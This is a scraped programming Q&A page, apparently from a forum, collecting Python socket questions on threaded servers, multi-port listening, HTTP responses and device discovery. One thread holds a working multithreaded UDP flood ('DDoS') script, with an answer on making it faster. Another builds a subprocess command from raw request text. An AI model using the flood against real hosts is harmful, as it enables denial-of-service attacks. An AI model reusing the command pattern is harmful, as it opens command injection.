python socketserver opening files from webpage

I am trying to make a small server that runs on local machines, receives a request from a webpage, and opens the requested file in OpenOffice. The approach below works so far. However, sometimes requests do not come through right away: when that happens I wait at least 5 seconds, hit it a couple more times, and then all of the queued requests arrive at once. I would really like this to be reliable. Is there something I am missing that will stop this from happening? Any help would be greatly appreciated. I am also aware that the way I am doing things may not be the safest; I am trying to make it functional first and will then work on making it more secure.
import SocketServer
import subprocess
import time

class MyTCPHandler(SocketServer.StreamRequestHandler):
    def handle(self):
        # self.request is the TCP socket connected to the client
        self.data = self.rfile.readline().strip()
        print self.data
        try:
            if self.data != '':
                st = self.data.split('\n', 1)[0]
                #print st
                st = st.split(' ')[1]
                print st
                if ".odt" in st:
                    p = subprocess.Popen('C:\openoffice\program\swriter.exe "'+st[1:]+'"')
                    time.sleep(1)
                    p.terminate()
        except Exception as err:
            print err
        # just send back the same data, but upper-cased
        self.wfile.write(self.data.upper())

PORT = 8081
httpd = SocketServer.TCPServer(("", PORT), MyTCPHandler)
print "serving at port", PORT
httpd.serve_forever()

Related

How to incorporate the IP address of a device into a Python script if the address changes

I have a Python script which retrieves the measured data from a smart plug so that I can visualize it on my Raspberry Pi.
This command gets the data
send_hs_command("192.168.1.26", 9999, b'{"emeter":{"get_realtime":{}}}')
and this is the function definition:
def send_hs_command(address, port, cmd):
    data = b""
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((address, port))
        tcp_sock.send(encrypt(cmd))
        data = tcp_sock.recv(2048)
    except socket.error:
        print(time.asctime(time.localtime(time.time())), "Socket closed.", file=sys.stderr)
    finally:
        tcp_sock.close()
    return data
My problem is that if I take the Smart Plug somewhere else, it will get a new IP address, which means I have to keep rewriting it in my Python script. This is not an option for me. What would be the simplest solution? Thanks.
I don't have a Pi to run this on.
If the IP address of the target (Smart Plug) is variable, can you not use a pre-determined host name (as configured in '/etc/hostname') instead?
The socket library provides a few handy functions. You can first use gethostbyaddr to get the host name if you don't have that information already. From that point onward you can use the known host name and call create_connection to establish connections (a minimal sketch follows below).
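To make the name-based suggestion concrete, here is a minimal sketch (Python 3). The hostname smartplug.local is an invented placeholder, gethostbyaddr() only succeeds if a reverse record (DNS, mDNS or hosts file) exists for the address, and the encrypted payload is stubbed out; adjust all of these to your setup.

import socket

# Hypothetical name for the plug; substitute whatever name your network
# actually resolves for the device at 192.168.1.26.
PLUG_HOSTNAME = "smartplug.local"
PLUG_PORT = 9999

# One-off reverse lookup if you only know the current IP address.
# gethostbyaddr() returns (hostname, aliaslist, ipaddrlist) or raises
# socket.herror when no reverse record exists.
hostname, aliases, addresses = socket.gethostbyaddr("192.168.1.26")
print("reverse lookup:", hostname)

# From then on, connect by name. create_connection() resolves the name on
# every call and applies an optional timeout.
with socket.create_connection((PLUG_HOSTNAME, PLUG_PORT), timeout=5) as tcp_sock:
    tcp_sock.send(b"...")        # the real code sends encrypt(cmd) here
    data = tcp_sock.recv(2048)

Because the name is resolved on every call, the plug can change its IP address as often as it likes, as long as the name keeps resolving.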
However, if you want something more dynamic, I'd suggest using the MAC address as the key.
Please be advised that running scapy (which may depend on tcpdump) on a Raspberry Pi can be CPU intensive.
Please take a look at the following snippet:
import socket
import time
import sys
from scapy.all import *

def send_hs_command(address, port, cmd):
    data = b""
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((address, port))
        tcp_sock.send(encrypt(cmd))
        data = tcp_sock.recv(2048)
    except socket.error:
        print(time.asctime(time.localtime(time.time())), "Socket closed.", file=sys.stderr)
    finally:
        tcp_sock.close()
    print(data)
    return data

def get_ip_from_mac():
    # Match ARP requests
    packet_list = sniff(filter="arp", count=10)  # increase number of arp counts
    for i in packet_list:
        # Show all ARP requests
        # print(i[Ether].src, "is broadcasting IP", i[ARP].psrc)
        if i[ARP].hwsrc == '00:0c:29:b6:f4:be':  # target MAC address
            return (True, i[ARP].psrc)
    return (False, '')

def main():
    result = get_ip_from_mac()
    if result[0] == True:
        print("Succeeded to reach server")
        send_hs_command(result[1], 22, b'{"emeter":{"get_realtime":{}}}')
    else:
        # logic to retry or graciously fail
        print("Failed to reach server")

if __name__ == "__main__":
    main()

Python 2.7 DDos Script is too slow

I am trying to create a DDoS script (for educational use), however it is currently too slow and only uses about 0.8 Mbit/s of my upload bandwidth (out of about 20 Mbit/s).
UPDATE 3
I have removed the server connection code to try to get this running fast enough, and it is finally fast enough to max out my upload speed (about 20 Mbit/s). Now I'm just looking for a way to run the connection code on the side, roughly once every 300 iterations of the main loop.
import time, socket, os, sys, string, urllib2, threading

print_lock = threading.Lock()

def attack():
    port = 80
    host = 'target ip address'
    message = "#I am the bestest in the world. "
    ip = socket.gethostbyname(host)
    ddos = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    ddos.connect((host, port))
    for i in xrange(10000000):
        try:
            ddos.sendto(message, (ip, port))
        except socket.error, msg:
            print("|[Connection Failed] |")
    ddos.close()

def main():
    print "DOS app started"
    for i in range(10000000):
        t = threading.Thread(target=attack)
        t.daemon = True
        t.start()
        t.join()

if __name__ == "__main__":
    main()
P.S.: I'm looking into Cython, but I'm not sure of its capabilities yet.
Use threading because it gives you much more throughput. Also, you're checking whether the host is up very frequently; instead, consider checking whether the host is up only once every x attempts.

issues with socket programming - python

I am doing a client-server project for college, where we have to allocate logins to the clients.
The client system requests its status every 2 seconds (to check whether it is locked or unlocked), and the server accepts the request and replies with the client's status.
But the problem is that the server thread is not responding to the client requests.
CLIENT THREAD:
def checkPort():
    while True:
        try:
            s = socket.socket()
            s.connect((host, port))
            s.send('pc1')  # send PC name to the server
            status = s.recv(1024)  # receive the status from the server
            if status == "unlock":
                disableIntrrupts()  # enable all the functions of system
            else:
                enableInterrupts()  # enable all the functions of system
            time.sleep(5)
            s.close()
        except Exception:
            pass
SERVER THREAD:
def check_port():
    while True:
        try:
            print "hello loop is repeating"
            conn, addr = s.accept()
            data = conn.recv(1024)
            if exit_on_click == 1:
                break
            if any(sublist[0] == data for sublist in available_sys):
                print "locked"
                conn.send("lock")
            elif any(sublist[0] == data for sublist in occupied_sys):
                conn.send("unlock")
                print "unlocked"
            else:
                print "added to gui for first time"
                available_sys.append([data, addr[0], nameText, usnText, branchText])
                availSysList.insert('end', data)
        except Exception:
            pass
But my problem is that the server thread does not execute more than twice, so it cannot accept client requests more than once.
Can't we handle multiple client sockets using a single server socket?
How do I handle multiple client requests on the server?
Thanks for any help!
It's because your server blocks waiting for a new connection on this line:
conn, addr = s.accept()
Calls like .accept() and .recv() are blocking calls that hold up the process.
You need to consider an alternative design, in which you either:
Have one process per connection (this idea is stupid)
Have one thread per connection (less stupid than the first, but still mostly foolish)
Have a non-blocking design that allows multiple clients and read/write without blocking execution.
To achieve the first, look at multiprocessing; for the second, threading. The third is slightly more complicated to get your head around, but will yield the best results. The go-to library for event-driven code in Python is twisted, but there are others like
gevent
tulip
tornado
And many more that I haven't listed here. A minimal sketch of the non-blocking approach (option 3) follows below.
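Not part of the original answer: a minimal, untested sketch of option 3 using only the standard-library selectors module (Python 3), so you can see the shape of a non-blocking design without pulling in twisted or gevent. The port and the 'pc1' check are placeholders; plug in the real available_sys/occupied_sys lookup where noted.

import selectors
import socket

sel = selectors.DefaultSelector()

def accept(server_sock):
    conn, addr = server_sock.accept()
    conn.setblocking(False)
    sel.register(conn, selectors.EVENT_READ, handle_client)

def handle_client(conn):
    data = conn.recv(1024)
    if not data:                     # empty read means the client closed
        sel.unregister(conn)
        conn.close()
        return
    # Replace this stub with the real available_sys/occupied_sys lookup.
    conn.send(b"unlock" if data == b"pc1" else b"lock")

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("", 9000))              # placeholder port
server.listen(5)
server.setblocking(False)
sel.register(server, selectors.EVENT_READ, accept)

while True:
    for key, _ in sel.select():      # blocks until at least one socket is ready
        key.data(key.fileobj)        # dispatch to accept() or handle_client()

A single thread services every client here, because the loop only ever touches sockets that the selector reports as ready.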
here's a full example of implementing a threaded server. it's fully functional and comes with the benefit of using SSL as well. further, i use threaded event objects to signal another class object after storing my received data in a database.
please note, _sni and _cams_db are additional modules purely of my own. if you want to see the _sni module (it provides SNI support for pyOpenSSL), let me know.
what follows is a snippet from camsbot.py; there's a whole lot more that far exceeds the scope of this question. what i've built is a centralized message relay system. it listens on tcp/2345 and accepts SSL connections. each connection passes messages into the system. short-lived connections connect, pass a message, and disconnect; long-lived connections pass numerous messages after connecting. messages are stored in a database, and a threading.Event() object (attached to the DB class) is set to tell the bot to poll the database for new messages and relay them.
the below example shows
how to set up a threaded tcp server
how to pass information from the listener to the accept handler such as config data and etc
in addition, this example also shows
how to employ an SSL socket
how to do some basic certificate validations
how to cleanly wrap and unwrap SSL from a tcp socket
how to use poll() on the socket instead of select()
db.pending is a threading.Event() object in _cams_db.py
in the main process we start another thread that waits on the pending object with db.pending.wait(). this makes that thread wait until another thread does db.pending.set(). once it is set, our waiting thread immediately wakes up and continues to work. when our waiting thread is done, it calls db.pending.clear() and goes back to the beginning of the loop and starts waiting again with db.pending.wait()
while True:
    db.pending.wait()
    # after waking up, do code. for example, we wait for incoming messages to
    # be stored in the database. the threaded server will call db.pending.set()
    # which will wake us up. we'll poll the DB for new messages, relay them, clear
    # our event flag and go back to waiting.
    # ...
    db.pending.clear()
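For reference, here is the same Event pattern as a self-contained sketch, separate from the bot's own modules (db and _cams_db above are the author's code and aren't shown). The one liberty taken is clearing the flag before draining the queue, so a set() that arrives mid-drain isn't lost.

import threading, queue, time

pending = threading.Event()
messages = queue.Queue()

def relay_worker():
    while True:
        pending.wait()            # sleep until a producer calls pending.set()
        pending.clear()           # clear first so a set() during the drain isn't lost
        while not messages.empty():
            print("relaying:", messages.get())

def producer():
    for i in range(3):
        messages.put("message %d" % i)
        pending.set()             # wake the relay thread
        time.sleep(1)

threading.Thread(target=relay_worker, daemon=True).start()
producer()
time.sleep(2)                     # give the worker time to drain the last batch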
snippet from camsbot.py:
import sys, os, time, datetime, threading, select, logging, logging.handlers
import configparser, traceback, re, socket, hashlib

# local .py
sys.path.append('/var/vse/python')
import _util, _webby, _sni, _cams_db, _cams_threaded_server, _cams_bot

# ...

def start_courier(config):
    # default values
    host = '::'
    port = 2345

    configp = config['configp']
    host = configp.get('main', 'relay msp hostport')
    # require ipv6 addresses be specified in [xx:xx:xx] notation, therefore
    # it is safe to look for :nnnn at the end
    if ':' in host and not host.endswith(']'):
        port = host.split(':')[-1]
        try:
            port = int(port, 10)
        except:
            port = 2345
        host = host.split(':')[:-1][0]

    server = _cams_threaded_server.ThreadedTCPServer((host, port), _cams_threaded_server.ThreadedTCPRequestHandler, config)
    t = threading.Thread(target=server.serve_forever, name='courier')
    t.start()
_cams_threaded_server.py:
import socket, socketserver, select, datetime, time, threading
import sys, struct

from OpenSSL.SSL import SSLv23_METHOD, SSLv3_METHOD, TLSv1_METHOD, OP_NO_SSLv2
from OpenSSL.SSL import VERIFY_NONE, VERIFY_PEER, VERIFY_FAIL_IF_NO_PEER_CERT, Context, Connection
from OpenSSL.SSL import FILETYPE_PEM
from OpenSSL.SSL import WantWriteError, WantReadError, WantX509LookupError, ZeroReturnError, SysCallError
from OpenSSL.crypto import load_certificate
from OpenSSL import SSL

# see note at beginning of answer
import _sni, _cams_db

class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    def __init__(self, server_address, HandlerClass, config):
        socketserver.BaseServer.__init__(self, server_address, HandlerClass)
        self.address_family = socket.AF_INET6
        self.connected = []
        self.logger = config['logger']
        self.config = config
        self.socket = socket.socket(self.address_family, self.socket_type)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sc = Context(TLSv1_METHOD)
        sc.set_verify(VERIFY_PEER|VERIFY_FAIL_IF_NO_PEER_CERT, _sni.verify_cb)
        sc.set_tlsext_servername_callback(_sni.pick_certificate)
        self.sc = sc
        self.server_bind()
        self.server_activate()

class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    def handle(self):
        config = self.server.config
        logger = self.server.logger
        connected = self.server.connected
        sc = self.server.sc

        try:
            self.peer_hostname = socket.gethostbyaddr(socket.gethostbyname(self.request.getpeername()[0]))[0]
        except:
            self.peer_hostname = '!'+self.request.getpeername()[0]
        logger.info('peer: {}'.format(self.peer_hostname))

        ssl_s = Connection(sc, self.request)
        ssl_s.set_accept_state()
        try:
            ssl_s.do_handshake()
        except:
            t,v,tb = sys.exc_info()
            logger.warn('handshake failed {}'.format(v))
        ssl_s.setblocking(True)
        self.ssl_s = ssl_s

        try:
            peercert = ssl_s.get_peer_certificate()
        except:
            peercert = False
            t,v,tb = sys.exc_info()
            logger.warn('SSL get peer cert failed: {}'.format(v))
        if not peercert:
            logger.warn('No peer certificate')
        else:
            acl = config['configp']['main'].get('client cn acl', '').split(' ')
            cert_subject = peercert.get_subject().CN
            logger.info('Looking for {} in acl: {}'.format(cert_subject,acl))
            if cert_subject in acl:
                logger.info('{} is permitted'.format(cert_subject))
            else:
                logger.warn('''client CN not approved''')

        # it's ok to block here, every socket has its own thread
        ssl_s.setblocking(True)

        self.db = config['db']
        msgcount = 0

        p = select.poll()
        # don't want writable, just readable
        p.register(self.request, select.POLLIN|select.POLLPRI|select.POLLERR|select.POLLHUP|select.POLLNVAL)

        peername = ssl_s.getpeername()
        x = peername[0]
        if x.startswith('::ffff:'):
            x = x[7:]
        peer_ip = x
        try:
            host = socket.gethostbyaddr(x)[0]
        except:
            host = peer_ip
        logger.info('{}/{}:{} connected'.format(host, peer_ip, peername[1]))
        connected.append( [host, peername[1]] )
        if peercert:
            threading.current_thread().setName('{}/port={}/CN={}'.format(host, peername[1], peercert.get_subject().CN))
        else:
            threading.current_thread().setName('{}/port={}'.format(host, peername[1]))

        sockclosed = False
        while not sockclosed:
            keepreading = True
            #logger.debug('starting 30 second timeout for poll')
            pe = p.poll(30.0)
            if not pe:
                # empty list means poll timeout
                # for SSL sockets it means WTF. we get an EAGAIN like return even if the socket is blocking
                continue
            logger.debug('poll indicates: {}'.format(pe))
            #define SSL_NOTHING 1
            #define SSL_WRITING 2
            #define SSL_READING 3
            #define SSL_X509_LOOKUP 4
            while keepreading and not sockclosed:
                data,sockclosed,keepreading = self._read_ssl_data(2, head=True)
                if sockclosed or not keepreading:
                    time.sleep(5)
                    continue
                plen = struct.unpack('H', data)[0]
                data,sockclosed,keepreading = self._read_ssl_data(plen)
                if sockclosed or not keepreading:
                    time.sleep(5)
                    continue
                # send thank you, ignore any errors since we appear to have gotten
                # the message
                try:
                    self.ssl_s.sendall(b'ty')
                except:
                    pass
                # extract the timestamp
                message_ts = data[0:8]
                msgtype = chr(data[8])
                message = data[9:].decode()
                message_ts = struct.unpack('d', message_ts)[0]
                message_ts = datetime.datetime.utcfromtimestamp(message_ts).replace(tzinfo=datetime.timezone.utc)
                self.db.enqueue(config['group'], peer_ip, msgtype, message, message_ts)
                self.db.pending.set()

        # we're recommended to use the return socket object for any future operations rather than the original
        try:
            s = ssl_s.unwrap()
            s.close()
        except:
            pass
        connected.remove( [host, peername[1]] )
        t_name = threading.current_thread().getName()
        logger.debug('disconnect: {}'.format(t_name))

    def _read_ssl_data(self, wantsize=16384, head=False):
        _w = ['WANT_NOTHING','WANT_READ','WANT_WRITE','WANT_X509_LOOKUP']
        logger = self.server.logger
        data = b''
        sockclosed = False
        keepreading = True
        while len(data) < wantsize and keepreading and not sockclosed:
            rlen = wantsize - len(data)
            try:
                w,wr = self.ssl_s.want(),self.ssl_s.want_read()
                #logger.debug(' want({}) want_read({})'.format(_w[w],wr))
                x = self.ssl_s.recv(rlen)
                #logger.debug(' recv(): {}'.format(x))
                if not ( x or len(x) ):
                    raise ZeroReturnError
                data += x
                if not (len(x) == len(data) == wantsize):
                    logger.info(' read={}, len(data)={}, plen={}'.format(len(x),len(data),wantsize))
            except WantReadError:
                # poll(), when ready, read more
                keepreading = False
                logger.info(' got WantReadError')
                continue
            except WantWriteError:
                # poll(), when ready, write more
                keepreading = False
                logger.info(' got WantWriteError')
                continue
            except ZeroReturnError:
                # socket got closed, a '0' bytes read also means the same thing
                keepreading = False
                sockclosed = True
                logger.info(' ZRE, socket closed normally')
                continue
            except SysCallError:
                keepreading = False
                sockclosed = True
                t,v,tb = sys.exc_info()
                if v.args[0] == -1: # normal EOF
                    logger.info(' EOF found, keepreading=False')
                else:
                    logger.info('{} terminated session abruptly while reading plen'.format(self.peer_hostname))
                    logger.info('t: {}'.format(t))
                    logger.info('v: {}'.format(v))
                continue
            except:
                t,v,tb = sys.exc_info()
                logger.warning(' fucked? {}'.format(v))
                raise
        if not head and not len(data) == wantsize:
            logger.warn(' short read {} of {}'.format(len(data), wantsize))
        return data,sockclosed,keepreading
let's start with a bare bones threaded tcp server.
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    def __init__(self, server_address, HandlerClass):
        socketserver.BaseServer.__init__(self, server_address, HandlerClass)
        self.address_family = socket.AF_INET
        self.socket = socket.socket(self.address_family, self.socket_type)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server_bind()
        self.server_activate()

class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    def handle(self):
        # self.request is your accepted socket, do all your .recv() and .send() on it
        s = self.request
        request = s.recv(1024)
        # decide locked or unlocked. this example arbitrarily writes back 'locked'
        s.send(b'locked')
        # we're done, close the socket and exit with a default return of None
        s.close()
ok, start your threaded server with this in your main() function:
server = ThreadedTCPServer(('127.0.0.1', 1234), ThreadedTCPRequestHandler)
t = threading.Thread(target=server.serve_forever, name='optional_name')
t.start()
now you can let the threading module handle the semantics of concurrency and not worry about it.
You might want to take a look at 0MQ and concurrent.futures. 0MQ has a Tornado event loop in the library and it reduces the complexity of socket programming. concurrent.futures is a high level interface over threading or multiprocessing.
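None of the answers spell out concurrent.futures, so here is a minimal, untested sketch of the thread-pool variant applied to the asker's lock/unlock exchange. The port and the 'pc1' check are placeholders, not anything from the original code.

import socket
from concurrent.futures import ThreadPoolExecutor

def handle(conn, addr):
    try:
        data = conn.recv(1024)
        # Replace with the real available_sys/occupied_sys lookup.
        conn.send(b"unlock" if data == b"pc1" else b"lock")
    finally:
        conn.close()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("", 9000))              # placeholder port
server.listen(5)

# The pool caps concurrency at max_workers instead of spawning an unbounded
# number of threads, one per client.
with ThreadPoolExecutor(max_workers=10) as pool:
    while True:
        conn, addr = server.accept()
        pool.submit(handle, conn, addr)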
You can see different concurrent server approaches at
https://bitbucket.org/arco_group/upper/src
These should help you choose the approach that works best for you.
Cheers

Why does my HTTP response using Python Sockets fail?

Code:
from socket import *

sP = 14000
servSock = socket(AF_INET, SOCK_STREAM)
servSock.bind(('', sP))
servSock.listen(1)

while 1:
    connSock, addr = servSock.accept()
    connSock.send('HTTP/1.0 200 OK\nContent-Type:text/html\nConnection:close\n<html>...</html>')
    connSock.close()
When I go to the browser and type in localhost:14000, I get error 101 (ERR_CONNECTION_RESET: The connection was reset). I'm not sure why. What am I doing wrong?
Several bugs, some more severe than others. As #IanWetherbee already noted, you need an empty line before the body. You should also send \r\n, not just \n. You should use sendall to avoid short sends. Last, you need to close the connection once you're done sending.
Here's a slightly modified version of the above:
from socket import *

sP = 14000
servSock = socket(AF_INET, SOCK_STREAM)
servSock.bind(('', sP))
servSock.listen(1)

while 1:
    connSock, addr = servSock.accept()
    connSock.sendall('HTTP/1.0 200 OK\r\nContent-Type:text/html\r\nConnection:close\r\n\r\n<html><head>foo</head></html>\r\n')
    connSock.close()
Running your code, I get similar errors and am unsure of their origin too. However, rather than rolling your own HTTP server, have you considered a built-in one? Check out the sample below. It can also support POST (you would have to add a do_POST method).
Simple HTTP Server
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class customHTTPServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write('<HTML><body>Hello World!</body></HTML>')
        return

def main():
    try:
        server = HTTPServer(('', 14000), customHTTPServer)
        print 'server started at port 14000'
        server.serve_forever()
    except KeyboardInterrupt:
        server.socket.close()

if __name__ == '__main__':
    main()

How to make server accepting connections from multiple ports?

How can I make a simple server (simple as in: accept a connection and print whatever is received to the terminal) accept connections on multiple ports, or on a port range?
Do I have to use multiple threads, one for each bind call, or is there another solution?
The simple server could look something like this:
def server():
    import sys, os, socket

    port = 11116
    host = ''
    backlog = 5  # Number of clients on wait.
    buf_size = 1024

    try:
        listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listening_socket.bind((host, port))
        listening_socket.listen(backlog)
    except socket.error, (value, message):
        if listening_socket:
            listening_socket.close()
        print 'Could not open socket: ' + message
        sys.exit(1)

    while True:
        accepted_socket, adress = listening_socket.accept()
        data = accepted_socket.recv(buf_size)
        if data:
            accepted_socket.send('Hello, and goodbye.')
        accepted_socket.close()

server()
EDIT:
This is an example of how it can be done. Thanks everyone.
import socket, select

def server():
    import sys, os, socket

    port_wan = 11111
    port_mob = 11112
    port_sat = 11113
    sock_lst = []
    host = ''
    backlog = 5  # Number of clients on wait.
    buf_size = 1024

    try:
        for item in port_wan, port_mob, port_sat:
            sock_lst.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
            sock_lst[-1].setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock_lst[-1].bind((host, item))
            sock_lst[-1].listen(backlog)
    except socket.error, (value, message):
        if sock_lst[-1]:
            sock_lst[-1].close()
            sock_lst = sock_lst[:-1]
        print 'Could not open socket: ' + message
        sys.exit(1)

    while True:
        read, write, error = select.select(sock_lst, [], [])
        for r in read:
            for item in sock_lst:
                if r == item:
                    accepted_socket, adress = item.accept()
                    print 'We have a connection with ', adress
                    data = accepted_socket.recv(buf_size)
                    if data:
                        print data
                        accepted_socket.send('Hello, and goodbye.')
                    accepted_socket.close()

server()
I'm not a Python guy, but the function you are interested in is select. It lets you watch multiple sockets and wakes up when activity occurs on any one of them.
Here's a Python example that uses select (a minimal sketch follows below).
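Since the example referred to above isn't reproduced in this page, this is a minimal sketch (Python 3) of select.select() watching two listening sockets at once. The ports are arbitrary placeholders; the asker's EDIT above shows a fuller three-port version.

import socket, select

def listener(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", port))
    s.listen(5)
    return s

listeners = [listener(p) for p in (11111, 11112)]   # placeholder ports

while True:
    # select() blocks until at least one listening socket has a pending connection.
    readable, _, _ = select.select(listeners, [], [])
    for s in readable:
        conn, addr = s.accept()
        print("connection on port", s.getsockname()[1], "from", addr)
        conn.send(b"Hello, and goodbye.")
        conn.close()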
Since Python's got so much overhead, multithreaded apps are a big point of debate. Then there's the whole blocking-operation-GIL issue too. Luckily, the Python motto of "If it seems like a big issue, someone's probably already come up with a solution (or several!)" holds true here. My favorite solution tends to be the microthread model, specifically gevent.
Gevent is an event-driven single-thread concurrency library that handles most issues for you out of the box via monkey-patching. gevent.monkey.patch_socket() is a function that replaces the normal socket calls with non-blocking variants, polling and sleeping to allow the switch to other greenlets as need be. If you want more control, or it's not cutting it for you, you can easily manage the switching with select and gevent's cooperative yield.
Here's a simple example.
import gevent
import socket
import gevent.monkey; gevent.monkey.patch_socket()

ALL_PORTS = [i for i in xrange(1024, 2048)]
MY_ADDRESS = "127.0.0.1"

def init_server_sock(port):
    try:
        s = socket.socket()
        s.setblocking(0)
        s.bind((MY_ADDRESS, port))
        s.listen(5)
        return s
    except Exception, e:
        print "Exception creating socket at port %i: %s" % (port, str(e))
        return False

def interact(port, sock):
    while 1:
        try:
            csock, addr = sock.accept()
        except:
            continue
        data = ""
        while not data:
            try:
                data = csock.recv(1024)
                print data
            except:
                gevent.sleep(0)  # this is the cooperative yield
        csock.send("Port %i got your message!" % port)
        csock.close()
        gevent.sleep(0)

def main():
    socks = {p: init_server_sock(p) for p in ALL_PORTS}
    greenlets = []
    for k, v in socks.items():
        if not v:
            socks.pop(k)
        else:
            greenlets.append(gevent.spawn(interact, k, v))
    # now we've got our sockets, let's start accepting
    gevent.joinall(greenlets)
That would be a super-simple, completely untested server serving the plain text "Port N got your message!" on ports 1024-2047. Involving select is a little harder; you'd need a manager greenlet that calls select and then starts up the active ones, but that's not massively hard to implement.
Hope this helps! The nice part of the greenlet-based philosophy is that the select call is actually part of gevent's hub module, as I recall, which lets you build a much more scalable and complex server more easily. It's pretty efficient too; there are a couple of benchmarks floating around.
If you really wanted to be lazy (from a programmer's standpoint, not an efficiency standpoint), you could set a timeout on your blocking reads and just loop through all your sockets; if a timeout occurs, there wasn't any data available. Functionally, this is similar to what select does, but it takes that control away from the OS and puts it in your application.
Of course, this implies that as your sleep time gets smaller, your program approaches 100% CPU usage, so you wouldn't use it in a production app. It's fine for a toy, though.
It would go something like this: (not tested)
def server():
    import sys, os, socket

    port = 11116
    host = ''
    backlog = 5  # Number of clients on wait.
    buf_size = 1024
    NUM_SOCKETS = 10
    START_PORT = 2000

    try:
        socket.setdefaulttimeout(0.5)  # raise a socket.timeout error after a half second
        listening_sockets = []
        for i in range(NUM_SOCKETS):
            listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listening_socket.bind((host, START_PORT + i))
            listening_socket.listen(backlog)
            listening_sockets.append(listening_socket)
    except socket.error, (value, message):
        if listening_socket:
            listening_socket.close()
        print 'Could not open socket: ' + message
        sys.exit(1)

    while True:
        for sock in listening_sockets:
            try:
                accepted_socket, adress = sock.accept()
                data = accepted_socket.recv(buf_size)
                if data:
                    accepted_socket.send('Hello, and goodbye.')
                accepted_socket.close()
            except socket.timeout:
                pass

server()
